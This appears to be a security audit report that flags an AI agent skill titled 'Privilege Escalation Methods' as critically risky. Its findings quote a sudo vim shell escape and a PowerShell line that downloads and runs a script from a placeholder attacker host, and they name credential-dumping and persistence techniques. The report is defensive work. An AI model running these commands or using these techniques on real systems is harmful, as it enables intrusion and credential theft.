skills/sebas-aikon-intelligence/antigravity-awesome-skills/Privilege Escalation Methods/Gen Agent Trust Hub
Privilege Escalation Methods
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: CRITICALCOMMAND_EXECUTIONDATA_EXFILTRATIONREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION] (CRITICAL): The skill instructs the agent on how to bypass system security boundaries using various methods such as exploiting sudo misconfigurations (e.g.,
sudo vim -c ':!/bin/bash'), abusing SUID binaries, and manipulating Windows services to obtain SYSTEM privileges. - [REMOTE_CODE_EXECUTION] (CRITICAL): The skill explicitly details how to establish persistence and remote control by creating scheduled tasks that download and execute arbitrary scripts:
powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'. - [DATA_EXFILTRATION] (HIGH): It provides instructions for harvesting sensitive data, including Active Directory databases (
NTDS.dit), system memory secrets usingMimikatz, and SSH keys viatarwith specific capabilities. - [EXTERNAL_DOWNLOADS] (HIGH): Several techniques rely on downloading and executing third-party tools (e.g.,
SweetPotato,Rubeus,SharpGPOAbuse) from unspecified or untrusted locations to facilitate exploitation. - [PERSISTENCE] (HIGH): Includes methods to maintain unauthorized access across reboots by modifying Linux crontabs and Windows Scheduled Tasks, which are classic indicators of compromise.
Recommendations
- AI detected serious security threats
Audit Metadata